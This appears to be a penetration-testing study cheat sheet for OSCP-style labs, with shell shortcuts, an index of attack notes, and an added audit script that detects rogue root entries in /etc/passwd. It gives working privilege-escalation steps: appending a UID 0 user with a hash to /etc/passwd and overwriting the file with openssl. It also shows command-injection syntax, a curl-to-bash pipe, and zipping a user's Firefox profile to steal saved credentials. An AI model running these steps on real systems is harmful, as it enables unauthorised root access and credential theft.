Useful Information

==============================================================================================================================================================================

More options to select from in details

Scenarios
Upgrading Shells
Best Wordlists / Shell
Bloodhound/Neo4j
Various Scripts
OSCP Cheatguides
Reverse_Shell Gen
Troubleshooting
Tool Usage
DB Usage
=============================================================================================================================================================================

Time Saving Tips

CTRL A - to start of command line

CTRL E - to end of command line

Add to /etc/hosts: printf "%s\t%s\n\n" "$IP" "enter the domains/websites" | sudo tee -a /etc/hosts (set the IP variable first with IP=xx.xx.xx.xx)

!! - to execute last command 

sudo !! - if you forgot to put sudo in front of the command

use tree to list files for ease of viewing

----------------------------------------------------------------------------------------------------------------------------------------------------------------

Adding a user to /etc/passwd from command line

This example uses openssl

1. generate a password hash: openssl passwd <choose password>

2. cp /etc/passwd /tmp/passdoc

3. echo "newroot1:tUQ7/t9jN8cEU:0:0:root:/root:/bin/bash" >> /tmp/passdoc - special characters in the hash (e.g. $) need escaping with \ inside double quotes

4. now copy /tmp/passdoc back over /etc/passwd

5. cat /tmp/passdoc | openssl enc -out /etc/passwd (with no cipher specified, openssl enc passes the input through unchanged, so this works even when cp to /etc/passwd is not an option)
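Added defender-side check, not part of these notes: a POSIX shell audit that flags exactly the kind of entry step 3 writes (a second UID 0 account, and a password hash sitting in /etc/passwd instead of /etc/shadow). The sample passwd file it audits is constructed inside the block; on a real host run audit_passwd /etc/passwd.

```shell
#!/bin/sh
# Added audit helper (not from the notes above): flags the kind of entry
# that step 3 writes into /etc/passwd.
#
# audit_passwd FILE
#   Prints one finding per line and returns the number of findings
#   (0 = nothing suspicious). Per entry it checks for:
#     UID0            a superuser account whose name is not "root"
#     HASH_IN_PASSWD  a real hash in field 2 instead of "x" (world-readable,
#                     so crackable; hashes belong in /etc/shadow)
#     EMPTY_PASSWORD  field 2 empty, i.e. login without a password
#     MALFORMED       not exactly 7 colon-separated fields
audit_passwd() {
    awk -F: '
        NF != 7 { printf "MALFORMED line %d: %s\n", NR, $0; n++; next }
        $3 == 0 && $1 != "root" { printf "UID0 %s shell=%s\n", $1, $7; n++ }
        $2 == "" { printf "EMPTY_PASSWORD %s\n", $1; n++ }
        $2 != "" && $2 != "x" && $2 !~ /^[*!]+$/ {
            printf "HASH_IN_PASSWD %s\n", $1; n++ }
        END { exit n + 0 }
    ' "$1"
}

# make_sample: writes a constructed passwd file (sample data, not a real
# system) to a temp path and prints that path. It contains the newroot1
# line from step 3 plus a few normal entries and one passwordless account.
make_sample() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
alice:x:1000:1000:Alice:/home/alice:/bin/bash
newroot1:tUQ7/t9jN8cEU:0:0:root:/root:/bin/bash
guest::1001:1001::/home/guest:/bin/sh
EOF
    printf '%s\n' "$f"
}

# Stand-alone run: ./audit.sh --demo  (on a real host: audit_passwd /etc/passwd)
if [ "${1:-}" = "--demo" ]; then
    sample=$(make_sample)
    audit_passwd "$sample"
    echo "findings: $?"
    rm -f "$sample"
fi
```

The sample produces three findings: newroot1 is reported twice (UID0 and HASH_IN_PASSWD) and guest once (EMPTY_PASSWORD); the locked sync entry (*) is correctly ignored.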

---------------------------------------------------------------------------------------------------------------------------------------------------------------

Quick tips: General

1. Command Injection: add a ";" or a pipe (|) followed by the command you want injected (e.g. 127.0.0.1;id)

2. Look at the wording on the website: words like "user-agent" or "fetching" indicate the User-Agent header is used, so you may need to change it. Something like "fetch" or similar may point to an SQL database behind the page

3. Sub-domain fuzzing: use ffuf with the SecLists DNS wordlists (Discovery/DNS/subdomains-top1million-*.txt)

Do not forget to check for extension types too when directory fuzzing (-x php,html,txt)

4. ss -tulnp - great way to find listening ports and the process behind them (e.g. you may find a running SQL server and type)

5. getent - retrieves entries from the system databases (passwd, group, etc.)

6. getent usage: getent passwd, getent passwd <username>

7. Restricted shell escape: export PATH="$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


-------------------------------------------------------------------------------------------------------------------------------------------------------------

Quick Tips: TOOLS

1. Using curl to fetch a reverse shell: you may not need every directory in the path. For example with http://abc.com/abc/file_uploads/shell.php you may only need the /abc/ part of it

2. Using curl to download and pipe into bash: you can download a tool with curl and pipe it straight into bash: curl <url> | bash

3. If you come across a .mozilla directory (in a user's home dir), go to /tmp and run: zip -r /tmp/mozilla.zip /home/username/.mozilla, then transfer it out. Then download firefox_decrypt from GitHub

4. ffuf - filter out unwanted response sizes with -fs <size>

5. Update only one tool: sudo apt-get install --only-upgrade <tool name>

6. SSH: -o StrictHostKeyChecking=no


-----------------------------------------------------------------------------------------------------------------------------------------------------------------

When hacking - open the following obsidian vaults:

Web Applications (tomcat, drupal, wordpress etc): use Attacking Common Applications

Active Directory: use Active Directory (HTB)

Common Services (FTP,SSH etc): use Attacking Common Services

Windows Privilege Escalation: use Windows Priv Esc

OWASP top 10 (command injection,broken auth, xss etc): use Bug Bounty Path HTB

Linux Privilege Escalation: use Privilege Escalation

Shells and Payloads ( windows and linux): use Shell and Payloads

DNS and sub-domains: use HTB Academy Tasks

BoF: use Buffer Overflows


When Hacking: use the following in OSCP Guide directory

Active Directory : Use Attacking AD with Linux

Bloodhound Install: Use BloodHound Active Directory

AD Enumeration using Powershell: Use AD Enumeration with Powershell

File Transfers and tools: Use File Transfers

Port Forwarding and Tunnelling in detail: Use Port Forwarding and Tunnelling

Kerberoasting: Use Kerberroasting Guide

Various Cheatsheets (covering Linux/Windows/Tools): Windows Linux Priv Esc Cheat Sheet